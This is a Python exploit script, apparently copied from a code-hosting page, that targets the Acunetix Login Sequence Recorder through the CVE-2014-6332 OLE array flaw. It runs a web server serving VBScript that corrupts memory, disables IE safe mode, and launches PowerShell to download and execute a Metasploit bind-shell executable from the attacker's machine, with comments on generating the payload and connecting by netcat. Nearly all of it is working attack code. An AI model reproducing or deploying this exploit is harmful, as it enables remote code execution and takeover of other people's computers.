240 lines
No EOL
9.6 KiB
Python
Executable file
240 lines
No EOL
9.6 KiB
Python
Executable file
#!/usr/bin/python
|
|
|
|
import BaseHTTPServer, sys, socket
|
|
|
|
##
|
|
# Acunetix OLE Automation Array Remote Code Execution
|
|
#
|
|
# Author: Naser Farhadi
|
|
# Linkedin: http://ir.linkedin.com/pub/naser-farhadi/85/b3b/909
|
|
#
|
|
# Date: 27 Mar 2015 # Version: <=9.5 # Tested on: Windows 7
|
|
# Description: Acunetix Login Sequence Recorder (lsr.exe) Uses CoCreateInstance API From Ole32.dll To Record
|
|
# Target Login Sequence
|
|
# Exploit Based on MS14-064 CVE2014-6332 http://www.exploit-db.com/exploits/35229/
|
|
# This Python Script Will Start A Sample HTTP Server On Your Machine And Serves Exploit Code And
|
|
# Metasploit windows/shell_bind_tcp Executable Payload
|
|
# And Finally You Can Connect To Victim Machine Using Netcat
|
|
# Usage:
|
|
# chmod +x acunetix.py
|
|
# ./acunetix.py
|
|
# Attacker Try To Record Login Sequence Of Your Http Server Via Acunetix
|
|
# nc 192.168.1.7 333
|
|
# Payload Generated By This Command: msfpayload windows/shell_bind_tcp LPORT=333 X > acunetix.exe
|
|
#
|
|
# Video: https://vid.me/SRCb
|
|
##
|
|
|
|
class RequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
|
|
def do_GET(req):
|
|
req.send_response(200)
|
|
if req.path == "/acunetix.exe":
|
|
req.send_header('Content-type', 'application/exe')
|
|
req.end_headers()
|
|
exe = open("acunetix.exe", 'rb')
|
|
req.wfile.write(exe.read())
|
|
exe.close()
|
|
else:
|
|
req.send_header('Content-type', 'text/html')
|
|
req.end_headers()
|
|
req.wfile.write("""Please scan me!
|
|
<SCRIPT LANGUAGE="VBScript">
|
|
function runmumaa()
|
|
On Error Resume Next
|
|
set shell=createobject("Shell.Application")
|
|
command="Invoke-Expression $(New-Object System.Net.WebClient).DownloadFile('http://"""+socket.gethostbyname(socket.gethostname())+"""/acunetix.exe',\
|
|
'acunetix.exe');$(New-Object -com Shell.Application).ShellExecute('acunetix.exe');"
|
|
shell.ShellExecute "powershell", "-Command " & command, "", "runas", 0
|
|
end function
|
|
|
|
dim aa()
|
|
dim ab()
|
|
dim a0
|
|
dim a1
|
|
dim a2
|
|
dim a3
|
|
dim win9x
|
|
dim intVersion
|
|
dim rnda
|
|
dim funclass
|
|
dim myarray
|
|
|
|
Begin()
|
|
|
|
function Begin()
|
|
On Error Resume Next
|
|
info=Navigator.UserAgent
|
|
|
|
if(instr(info,"Win64")>0) then
|
|
exit function
|
|
end if
|
|
|
|
if (instr(info,"MSIE")>0) then
|
|
intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
|
|
else
|
|
exit function
|
|
|
|
end if
|
|
|
|
win9x=0
|
|
|
|
BeginInit()
|
|
If Create()=True Then
|
|
myarray= chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
|
|
myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
|
|
|
|
if(intVersion<4) then
|
|
document.write("<br> IE")
|
|
document.write(intVersion)
|
|
runshellcode()
|
|
else
|
|
setnotsafemode()
|
|
end if
|
|
end if
|
|
end function
|
|
|
|
function BeginInit()
|
|
Randomize()
|
|
redim aa(5)
|
|
redim ab(5)
|
|
a0=13+17*rnd(6)
|
|
a3=7+3*rnd(5)
|
|
end function
|
|
|
|
function Create()
|
|
On Error Resume Next
|
|
dim i
|
|
Create=False
|
|
For i = 0 To 400
|
|
If Over()=True Then
|
|
' document.write(i)
|
|
Create=True
|
|
Exit For
|
|
End If
|
|
Next
|
|
end function
|
|
|
|
sub testaa()
|
|
end sub
|
|
|
|
function mydata()
|
|
On Error Resume Next
|
|
i=testaa
|
|
i=null
|
|
redim Preserve aa(a2)
|
|
|
|
ab(0)=0
|
|
aa(a1)=i
|
|
ab(0)=6.36598737437801E-314
|
|
|
|
aa(a1+2)=myarray
|
|
ab(2)=1.74088534731324E-310
|
|
mydata=aa(a1)
|
|
redim Preserve aa(a0)
|
|
end function
|
|
|
|
|
|
function setnotsafemode()
|
|
On Error Resume Next
|
|
i=mydata()
|
|
i=readmemo(i+8)
|
|
i=readmemo(i+16)
|
|
j=readmemo(i+&h134)
|
|
for k=0 to &h60 step 4
|
|
j=readmemo(i+&h120+k)
|
|
if(j=14) then
|
|
j=0
|
|
redim Preserve aa(a2)
|
|
aa(a1+2)(i+&h11c+k)=ab(4)
|
|
redim Preserve aa(a0)
|
|
|
|
j=0
|
|
j=readmemo(i+&h120+k)
|
|
|
|
Exit for
|
|
end if
|
|
|
|
next
|
|
ab(2)=1.69759663316747E-313
|
|
runmumaa()
|
|
end function
|
|
|
|
function Over()
|
|
On Error Resume Next
|
|
dim type1,type2,type3
|
|
Over=False
|
|
a0=a0+a3
|
|
a1=a0+2
|
|
a2=a0+&h8000000
|
|
|
|
redim Preserve aa(a0)
|
|
redim ab(a0)
|
|
|
|
redim Preserve aa(a2)
|
|
|
|
type1=1
|
|
ab(0)=1.123456789012345678901234567890
|
|
aa(a0)=10
|
|
|
|
If(IsObject(aa(a1-1)) = False) Then
|
|
if(intVersion<4) then
|
|
mem=cint(a0+1)*16
|
|
j=vartype(aa(a1-1))
|
|
if((j=mem+4) or (j*8=mem+8)) then
|
|
if(vartype(aa(a1-1))<>0) Then
|
|
If(IsObject(aa(a1)) = False ) Then
|
|
type1=VarType(aa(a1))
|
|
end if
|
|
end if
|
|
else
|
|
redim Preserve aa(a0)
|
|
exit function
|
|
|
|
end if
|
|
else
|
|
if(vartype(aa(a1-1))<>0) Then
|
|
If(IsObject(aa(a1)) = False ) Then
|
|
type1=VarType(aa(a1))
|
|
end if
|
|
end if
|
|
end if
|
|
end if
|
|
|
|
|
|
If(type1=&h2f66) Then
|
|
Over=True
|
|
End If
|
|
If(type1=&hB9AD) Then
|
|
Over=True
|
|
win9x=1
|
|
End If
|
|
|
|
redim Preserve aa(a0)
|
|
|
|
end function
|
|
|
|
function ReadMemo(add)
|
|
On Error Resume Next
|
|
redim Preserve aa(a2)
|
|
|
|
ab(0)=0
|
|
aa(a1)=add+4
|
|
ab(0)=1.69759663316747E-313
|
|
ReadMemo=lenb(aa(a1))
|
|
|
|
ab(0)=0
|
|
|
|
redim Preserve aa(a0)
|
|
end function
|
|
|
|
</script>""")
|
|
|
|
if __name__ == '__main__':
|
|
sclass = BaseHTTPServer.HTTPServer
|
|
server = sclass((socket.gethostbyname(socket.gethostname()), 80), RequestHandler)
|
|
print "Http server started", socket.gethostbyname(socket.gethostname()), 80
|
|
try:
|
|
server.serve_forever()
|
|
except KeyboardInterrupt:
|
|
pass
|
|
server.server_close() |